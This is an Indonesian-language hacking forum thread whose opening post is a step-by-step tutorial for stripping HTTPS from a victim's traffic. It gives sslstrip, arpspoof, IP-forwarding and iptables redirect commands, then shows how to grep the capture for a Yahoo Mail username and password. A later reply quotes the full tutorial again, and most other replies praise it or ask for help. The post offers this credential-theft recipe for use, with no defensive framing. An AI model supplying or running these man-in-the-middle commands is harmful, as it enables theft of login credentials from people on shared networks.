|
| pwned https(Tutorial) | |
|
+14Destrozen syntaxerror relaxymousID rudi anom91 Tuan DC HenZ_DJ bumiayucyber night D. fury c0.b3_t3 cvbn45 CyberWild zer03s wh1t3_39ret 18 posters | Pengirim | Message |
---|
wh1t3_39ret NuuBiiTooL
Jumlah posting : 16 Points : 37 Reputation : 1 Join date : 25.03.11
| Subyek: pwned https(Tutorial) Thu Mar 31, 2011 9:51 pm | |
| kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip.. langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan : - ip attacker : 192.168.1.50 - ip victim : 192.168.1.200 - gateway : 192.168.1.5 sekilas mengenai sslstrip : - Code:
-
root@wh1t3_39ret:~# sslstrip --help
sslstrip 0.1 by Moxie Marlinspike Usage: sslstrip <options>
Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message. note : -opsi -a digunakan untuk logging semua trafic ( http,https) -opsi -s digunakan untuk logging traficc ssl saja -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 ) -opsi : -w : tempat file dump akan disimpan. 1.jalankan ssl strip : - Code:
-
root@wh1t3_39ret:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim - Code:
-
root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward : - Code:
-
root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward
3.redirect port victim ( 80 ) ke port sslstrip (10000) - Code:
-
root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ), - Code:
-
root@wh1t3_39ret:~# cat laharisi | grep -i "passwd=" url+="?";if(valid_js()){var passwd=form.passwd.value;var challen function hash2(form){var passwd=form.passwd.value 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In
kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan maaf kalo ada kesalahan..soalnya masih newbie... terima kasih... | |
| | | zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: Re: pwned https(Tutorial) Sun Jul 03, 2011 4:21 am | |
| mantaaapp gan ijin nyimaak :pening: | |
| | | zer03s Administrator
Jumlah posting : 2471 Points : 4119 Reputation : 113 Join date : 13.12.10 Age : 32 Lokasi : /home/root/blackc0de
| Subyek: Re: pwned https(Tutorial) Mon Aug 29, 2011 5:06 am | |
| buat om taslim pasti lagi butuh ini | |
| | | CyberWild Moderator
Jumlah posting : 1665 Points : 2310 Reputation : 104 Join date : 11.06.11 Age : 43 Lokasi : internet cloud
| Subyek: Re: pwned https(Tutorial) Mon Aug 29, 2011 5:07 am | |
| wew https tembus bro? keren! | |
| | | cvbn45 Moderator
Jumlah posting : 275 Points : 327 Reputation : 18 Join date : 01.01.11 Age : 31 Lokasi : dihatimu ^o^
| Subyek: Re: pwned https(Tutorial) Mon Aug 29, 2011 10:03 am | |
| ijin nyimak sambil belajar ... kurang ngerti yg kek beginian | |
| | | c0.b3_t3 Administrator
Jumlah posting : 227 Points : 488 Reputation : 37 Join date : 19.12.10 Lokasi : UNDER WORLD
| Subyek: Re: pwned https(Tutorial) Thu Sep 01, 2011 5:13 am | |
| Mancaps... | |
| | | night D. fury larva
Jumlah posting : 284 Points : 311 Reputation : 5 Join date : 05.07.11 Age : 34 Lokasi : Tanah nenek & kakek moyang
| Subyek: Re: pwned https(Tutorial) Fri Sep 09, 2011 3:26 pm | |
| terlalu manis OM | |
| | | bumiayucyber Newbie - Hack
Jumlah posting : 379 Points : 422 Reputation : 9 Join date : 08.09.11
| Subyek: Re: pwned https(Tutorial) Sat Sep 10, 2011 9:35 am | |
| sangat indah bro,untuk nikmati
ane ijin sedot dulu,budayakan share | |
| | | HenZ_DJ VIP Member
Jumlah posting : 567 Points : 711 Reputation : 10 Join date : 07.05.11 Age : 41 Lokasi : pekanbaru
| Subyek: Re: pwned https(Tutorial) Sat Sep 17, 2011 7:35 am | |
| - wh1t3_39ret wrote:
kali ini saya coba menjelaskan tentang hacking https connection menggunakan sslstrip..
langsung ke TKP...berikut adalah beberapa informasi mengenai jaringan :
- ip attacker : 192.168.1.50 - ip victim : 192.168.1.200 - gateway : 192.168.1.5
sekilas mengenai sslstrip : - Code:
-
root@wh1t3_39ret:~# sslstrip --help
sslstrip 0.1 by Moxie Marlinspike Usage: sslstrip <options>
Options: -w <filename>, --write=<filename> Specify file to log to (optional). -p , --post Log only SSL POSTs. (default) -s , --ssl Log all SSL traffic to and from server. -a , --all Log all SSL and HTTP traffic to and from server. -l <port>, --listen=<port> Port to listen on (default 10000). -f , --favicon Substitute a lock favicon on secure requests. -k , --killsessions Kill sessions in progress. -h Print this help message. note : -opsi -a digunakan untuk logging semua trafic ( http,https) -opsi -s digunakan untuk logging traficc ssl saja -opsi -l digunakan untuk listen port ( meredirect port 80 victim,defaultnya 10000 ) -opsi : -w : tempat file dump akan disimpan.
1.jalankan ssl strip : - Code:
-
root@wh1t3_39ret:~# sslstrip -a -w laharisi
2.lakukan arpspoof terhadap victim - Code:
-
root@wh1t3_39ret:~# root@wh1t3_39ret:~# arpspoof -i vmnet1 -t 192.168.1.200 192.168.1.5
akftifkan fungsi ip_forward : - Code:
-
root@wh1t3_39ret:~# echo 1 > /proc/sys/net/ipv4/ip_forward
3.redirect port victim ( 80 ) ke port sslstrip (10000) - Code:
-
root@wh1t3_39ret:~# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 10000
4.ketika victim melakukan browsing misalnya mail.yahoo.com,maka kita bisa melihat username dan password loginnya..caranya buka file dump ( laharisi ),
- Code:
-
root@wh1t3_39ret:~# cat laharisi | grep -i "passwd=" url+="?";if(valid_js()){var passwd=form.passwd.value;var challen function hash2(form){var passwd=form.passwd.value 2009-06-30 19:22:34,004 SECURE POST Data (login.yahoo.com): .tries=1&.src=ym&.md5=&.hash=&.js=&.last=&promo=&.intl=us&.bypass=&.partner=&.u=1esn43t54k0a5&.v=0&.challenge=EzdOJPTgncnTmCU_K.IjpAtfSawf&.yplus=&.emailCode=&pkg=&stepid=&.ev=&hasMsgr=0&.chkP=Y&.done=http%3A%2F%2Fmail.yahoo.com&.pd=ym_ver%3D0%26c%3D%26ivt%3D%26sg%3D&login=wh1t3_39ret&passwd=disambunyikan&.save=Sign+In
kita bisa melihat bahwa username = wh1t3_39ret dan password = disembunyikan
maaf kalo ada kesalahan..soalnya masih newbie...
terima kasih... hhhhhhhhhmmmmmmmmmmm gk paham w gan,,,,minta pencerahannya dunk agan2 yg sewa ma nih,,,,,,,,, | |
| | | Tuan DC BC Security
Jumlah posting : 623 Points : 704 Reputation : 41 Join date : 11.08.11 Lokasi : in the Hell
| Subyek: Re: pwned https(Tutorial) Sat Sep 17, 2011 1:52 pm | |
| ijin nyimak smbil blajar oms.. | |
| | | anom91 Corporal
Jumlah posting : 170 Points : 186 Reputation : 2 Join date : 15.08.11 Age : 33 Lokasi : 127.0.0.1
| Subyek: Re: pwned https(Tutorial) Mon Sep 26, 2011 11:11 am | |
| | |
| | | rudi Top Nubie
Jumlah posting : 33 Points : 42 Reputation : 3 Join date : 21.09.11 Age : 36
| Subyek: Re: pwned https(Tutorial) Tue Sep 27, 2011 10:52 am | |
| izin coba gan............ | |
| | | relaxymousID VIP Member
Jumlah posting : 447 Points : 519 Reputation : 14 Join date : 09.09.11 Lokasi : 127.0.0.1
| Subyek: Re: pwned https(Tutorial) Tue Sep 27, 2011 12:13 pm | |
| | |
| | | syntaxerror NuuBiiTooL
Jumlah posting : 7 Points : 7 Reputation : 0 Join date : 08.10.11
| Subyek: Re: pwned https(Tutorial) Sat Oct 08, 2011 8:53 am | |
| pencerahan donk ????? | |
| | | Destrozen Corporal
Jumlah posting : 156 Points : 166 Reputation : 3 Join date : 17.06.11 Lokasi : root
| Subyek: Re: pwned https(Tutorial) Fri Jan 27, 2012 3:12 am | |
| | |
| | | ocim32 Pro Nubie
Jumlah posting : 59 Points : 65 Reputation : 2 Join date : 28.01.12
| Subyek: Re: pwned https(Tutorial) Sat Jan 28, 2012 9:57 pm | |
| | |
| | | BumiayuKita Administrator
Jumlah posting : 2456 Points : 3020 Reputation : 85 Join date : 06.02.11 Age : 34 Lokasi : bumiayu
| Subyek: Re: pwned https(Tutorial) Sun Jan 29, 2012 8:00 am | |
| gw kondek bro,tq pinter sekali repu dah buat nt | |
| | | argalingga NuuBiiTooL
Jumlah posting : 5 Points : 7 Reputation : 0 Join date : 08.11.11
| Subyek: Re: pwned https(Tutorial) Sun Jan 29, 2012 9:02 am | |
| minta pencerahannya dong om newbii | |
| | | pudyfamouz NuuBiiTooL
Jumlah posting : 11 Points : 11 Reputation : 0 Join date : 28.01.12
| Subyek: Re: pwned https(Tutorial) Sun Jan 29, 2012 1:14 pm | |
| Dari comment-commentnya, kayanya berhasil ne cara.. tapi ane masih bingung ini pake terminal OS apa.??? pencerahannya dong om... | |
| | | Sponsored content
| Subyek: Re: pwned https(Tutorial) | |
| |
| | | | pwned https(Tutorial) | |
|
Similar topics | |
|
| Permissions in this forum: | Anda tidak dapat menjawab topik
| |
| |
| Latest topics | » Baktrack TutorialSun Jul 28, 2019 2:26 am by kenta » aplikasi gambas pada linuxTue Apr 30, 2019 10:28 am by kenta » beli linux ubuntu terbaru di surabayaSun Mar 31, 2019 10:08 am by kenta » desain robotFri Jan 19, 2018 1:25 pm by kenta » membuat robot tidak susahFri Jan 19, 2018 1:15 pm by kenta » Salam.. Salam.. Salam..Thu Nov 30, 2017 7:42 am by BumiayuKita» teknologi penyaring udara dan airWed Oct 04, 2017 8:41 am by kenta » [CloudMILD] VPS SSD IIX 2X RAM + Xtra SSD SpaceMon Jul 24, 2017 10:46 am by BumiayuKita» cara menutup akses dari situs negatifTue Apr 04, 2017 1:04 pm by kenta » Aplikasi Google TalkMon Mar 20, 2017 3:00 am by BumiayuKita» Driver buat Webcam PC ?? merknya M-Tech,, Fri Jan 30, 2015 8:51 pm by aelgrim » Portal Blog,,,,,Sun Dec 14, 2014 12:38 am by robofics» Appteknodroid - Seputar Dunia AndroidMon Nov 10, 2014 11:32 pm by Pr0phecy » Software animasi yang agan2 pakeTue Sep 30, 2014 1:11 pm by X_campus » INDO BILLING 6.70 + KEYSun Sep 21, 2014 2:17 pm by abdul halim |
Statistics | Total 12294 user terdaftar User terdaftar terakhir adalah Adlygans
Total 31710 kiriman artikel dari user in 5734 subjects
|
Banner Forum | Dukung forum Blackc0de dengan memasang bannernya.
|
Social Networking |
|
|